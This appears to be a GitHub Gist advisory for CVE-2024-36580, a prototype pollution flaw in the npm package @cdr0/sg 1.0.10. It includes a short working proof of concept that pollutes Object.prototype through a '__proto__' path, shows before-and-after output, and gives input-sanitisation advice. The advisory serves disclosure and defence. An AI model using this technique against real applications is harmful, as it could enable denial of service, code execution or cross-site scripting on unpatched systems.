Skip to content

Instantly share code, notes, and snippets.

@mestrtee
Last active June 12, 2024 14:37
Show Gist options
  • Save mestrtee/a75d75eca4622ad08f7cfa903a6cc9c3 to your computer and use it in GitHub Desktop.
Save mestrtee/a75d75eca4622ad08f7cfa903a6cc9c3 to your computer and use it in GitHub Desktop.
[CVE-2024-36580] Prototype Pollution vulnerability affecting @cdr0/sg, version 1.0.10

Overview

Affected versions of this module allow an attacker to manipulate the prototype of an object, potentially leading to the alteration of behavior of all objects inheriting from the affected prototype by modify built-in Object.prototype through reachable special properties __proto__ and constructor.prototype. Thus, the attacker can use one of these properties to pollute the application logic that can be escalated to Denial of service, remote code execution or cross-site scripting attacks.

Location:

@cdr0/sg/ref.js:89

PoC:

(async () => {
  const lib = await import('@cdr0/sg');

var BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}');
var victim = {}
console.log("Before Attack: ", JSON.stringify(victim.__proto__));
try {
  lib.default.setOn ({}, "__proto__.polluted", true)
} catch (e) { }
console.log("After Attack: ", JSON.stringify(victim.__proto__));
delete Object.prototype.polluted;
})();

Output:

Before Attack: {}
After Attack: {"polluted":true}

How to prevent:

No updates were provided by the maintainer. Users of this module are urged to implement proper santization and validation over user's supplied inputs, such as blocking inputs containing __proto__ and contructor.prototype

References:

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment